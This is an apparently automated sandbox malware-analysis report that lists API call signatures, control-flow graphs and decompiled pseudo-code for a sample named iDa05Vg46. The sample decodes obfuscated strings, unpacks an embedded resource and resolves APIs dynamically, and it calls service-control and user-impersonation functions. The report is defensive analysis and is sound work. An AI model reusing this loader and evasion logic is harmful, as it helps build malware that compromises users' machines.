                                                                                                                                                                                                        • API ID: ChangeConfigService
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3849694230-0
                                                                                                                                                                                                        • Opcode ID: 992f51d5263f4bf4f67eb183168a82a2ecdb06fc34f93b2ecb0037ac4b32ede9
                                                                                                                                                                                                        • Instruction ID: b07486c8bd48f10d0a9ea9051eb6badfa5c4ad8a0d49dd55fbb7f7b247cb92d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 992f51d5263f4bf4f67eb183168a82a2ecdb06fc34f93b2ecb0037ac4b32ede9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15F1C030918E4D4BEB68EF28CC46BF977D1FB58750F14422AE84EC7691DF74A5818B82
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                                                                                        • Opcode ID: cc20fecf85475e68b93b222b206d114e519c7c9a1b21e6890d47dcbd0c1c0b84
                                                                                                                                                                                                        • Instruction ID: 393ebf5e70a3b4ead2043f95c79cc363a898a2346eed4166879e1867e02b7ec1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc20fecf85475e68b93b222b206d114e519c7c9a1b21e6890d47dcbd0c1c0b84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E916D30618A4D8FEB68EF18C8597EA77D1FB54350F44427AD84ECB692CF74A485CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API node in graph: OpenServiceA]
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenService
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3098006287-0
                                                                                                                                                                                                        • Opcode ID: 788ba9fba5163b7a1c390569d94a0405851014eabda2c76bd8738e5597b41c04
                                                                                                                                                                                                        • Instruction ID: 2f5ba0369465ceb8f4a2968bc500212408c9e98b57a2ca4af8205ddc180317f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 788ba9fba5163b7a1c390569d94a0405851014eabda2c76bd8738e5597b41c04
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351A130518A4D4FEB58EE28C84A7B977D1FB59360F14422AE84DC7692DF74A842CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API node in graph: OpenServiceA]
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 165 7ff815f00b2d-7ff815f00bb8 169 7ff815f00bc2-7ff815f00bc7 165->169 170 7ff815f00bba-7ff815f00bbf 165->170 171 7ff815f00bd1-7ff815f00c08 OpenSCManagerW 169->171 172 7ff815f00bc9-7ff815f00bce 169->172 170->169 173 7ff815f00c10-7ff815f00c2d 171->173 174 7ff815f00c0a 171->174 172->171 174->173
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 175 7ff815f01a1d-7ff815f01a25 176 7ff815f01a27 175->176 177 7ff815f01a28-7ff815f01ad9 ControlService 175->177 176->177 180 7ff815f01ae1-7ff815f01b09 177->180 181 7ff815f01adb 177->181 181->180
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ControlService
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 253159669-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 182 7ff815f0108a-7ff815f010b3 183 7ff815f010b5-7ff815f010bd 182->183 184 7ff815f010be-7ff815f01152 FindCloseChangeNotification 182->184 183->184 187 7ff815f01154 184->187 188 7ff815f0115a-7ff815f01181 184->188 187->188
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 189 7ff815f01760-7ff815f01767 190 7ff815f01772-7ff815f017c5 189->190 191 7ff815f01769-7ff815f01771 189->191 193 7ff815f017cd-7ff815f01802 ImpersonateLoggedOnUser 190->193 191->190 194 7ff815f01804 193->194 195 7ff815f0180a-7ff815f01831 193->195 194->195
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2216092060-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 196 7ff815f00108-7ff815f00114 198 7ff815f00116 196->198 199 7ff815f0012b-7ff815f01802 ImpersonateLoggedOnUser 196->199 198->199 203 7ff815f01804 199->203 204 7ff815f0180a-7ff815f01831 199->204 203->204
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 32 401cd0-401cd4 22->32 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 32->36 37 401cd6-401cd8 32->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 68 401d55-401d57 62->68 66 401d3a-401d40 63->66 67 401d4c-401d4e 63->67 66->62 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 
85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				void* _t337;
                                                                                                                                                                                                        				void* _t340;
                                                                                                                                                                                                        				int _t341;
                                                                                                                                                                                                        				CHAR* _t344;
                                                                                                                                                                                                        				intOrPtr* _t349;
                                                                                                                                                                                                        				int _t350;
                                                                                                                                                                                                        				long _t352;
                                                                                                                                                                                                        				signed int _t354;
                                                                                                                                                                                                        				intOrPtr _t358;
                                                                                                                                                                                                        				long _t359;
                                                                                                                                                                                                        				CHAR* _t364;
                                                                                                                                                                                                        				struct HINSTANCE__* _t365;
                                                                                                                                                                                                        				CHAR* _t366;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                        				int _t368;
                                                                                                                                                                                                        				int _t369;
                                                                                                                                                                                                        				int _t370;
                                                                                                                                                                                                        				intOrPtr* _t376;
                                                                                                                                                                                                        				int _t378;
                                                                                                                                                                                                        				intOrPtr _t379;
                                                                                                                                                                                                        				intOrPtr* _t381;
                                                                                                                                                                                                        				int _t383;
                                                                                                                                                                                                        				intOrPtr* _t384;
                                                                                                                                                                                                        				int _t385;
                                                                                                                                                                                                        				int _t396;
                                                                                                                                                                                                        				int _t399;
                                                                                                                                                                                                        				int _t402;
                                                                                                                                                                                                        				int _t405;
                                                                                                                                                                                                        				intOrPtr* _t407;
                                                                                                                                                                                                        				int _t413;
                                                                                                                                                                                                        				int _t415;
                                                                                                                                                                                                        				void* _t421;
                                                                                                                                                                                                        				int _t422;
                                                                                                                                                                                                        				int _t424;
                                                                                                                                                                                                        				intOrPtr* _t428;
                                                                                                                                                                                                        				intOrPtr _t429;
                                                                                                                                                                                                        				intOrPtr* _t431;
                                                                                                                                                                                                        				int _t432;
                                                                                                                                                                                                        				int _t435;
                                                                                                                                                                                                        				intOrPtr* _t437;
                                                                                                                                                                                                        				int _t438;
                                                                                                                                                                                                        				intOrPtr* _t439;
                                                                                                                                                                                                        				int _t440;
                                                                                                                                                                                                        				int _t442;
                                                                                                                                                                                                        				signed int _t448;
                                                                                                                                                                                                        				signed int _t451;
                                                                                                                                                                                                        				signed int _t452;
                                                                                                                                                                                                        				int _t469;
                                                                                                                                                                                                        				int _t471;
                                                                                                                                                                                                        				int _t482;
                                                                                                                                                                                                        				signed int _t486;
                                                                                                                                                                                                        				intOrPtr* _t488;
                                                                                                                                                                                                        				intOrPtr* _t490;
                                                                                                                                                                                                        				intOrPtr* _t492;
                                                                                                                                                                                                        				intOrPtr _t493;
                                                                                                                                                                                                        				void* _t494;
                                                                                                                                                                                                        				struct HRSRC__* _t497;
                                                                                                                                                                                                        				void* _t514;
                                                                                                                                                                                                        				int _t519;
                                                                                                                                                                                                        				intOrPtr* _t520;
                                                                                                                                                                                                        				void* _t524;
                                                                                                                                                                                                        				void* _t525;
                                                                                                                                                                                                        				struct HINSTANCE__* _t526;
                                                                                                                                                                                                        				intOrPtr _t527;
                                                                                                                                                                                                        				void* _t531;
                                                                                                                                                                                                        				void* _t535;
                                                                                                                                                                                                        				struct HRSRC__* _t536;
                                                                                                                                                                                                        				intOrPtr* _t537;
                                                                                                                                                                                                        				intOrPtr* _t539;
                                                                                                                                                                                                        				int _t542;
                                                                                                                                                                                                        				int _t543;
                                                                                                                                                                                                        				intOrPtr* _t547;
                                                                                                                                                                                                        				intOrPtr* _t548;
                                                                                                                                                                                                        				intOrPtr* _t549;
                                                                                                                                                                                                        				intOrPtr* _t550;
                                                                                                                                                                                                        				void* _t551;
                                                                                                                                                                                                        				intOrPtr _t552;
                                                                                                                                                                                                        				int _t555;
                                                                                                                                                                                                        				void* _t556;
                                                                                                                                                                                                        				void* _t557;
                                                                                                                                                                                                        				void* _t558;
                                                                                                                                                                                                        				void* _t559;
                                                                                                                                                                                                        				void* _t560;
                                                                                                                                                                                                        				void* _t561;
                                                                                                                                                                                                        				void* _t562;
                                                                                                                                                                                                        				intOrPtr* _t563;
                                                                                                                                                                                                        				void* _t564;
                                                                                                                                                                                                        				void* _t565;
                                                                                                                                                                                                        				void* _t566;
                                                                                                                                                                                                        				void* _t567;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t567 = __eflags;
                                                                                                                                                                                                        				_t494 = __edx;
                                                                                                                                                                                                        				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                        				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                        				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                        				_t557 = _t556 + 0xc;
                                                                                                                                                                                                        				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                        					L80:
                                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                        					_t525 = _t340;
                                                                                                                                                                                                        					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                        					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                        					if(_t341 == 0) {
                                                                                                                                                                                                        						L38:
                                                                                                                                                                                                        						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                        						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                        						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                        						_t558 = _t557 + 8;
                                                                                                                                                                                                        						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                        						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                        						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                        						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                        						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                        						_push(0x40022);
                                                                                                                                                                                                        						_t537 = _t349; // executed
                                                                                                                                                                                                        						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                        						_t559 = _t558 + 8;
                                                                                                                                                                                                        						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                        						__eflags = _t350;
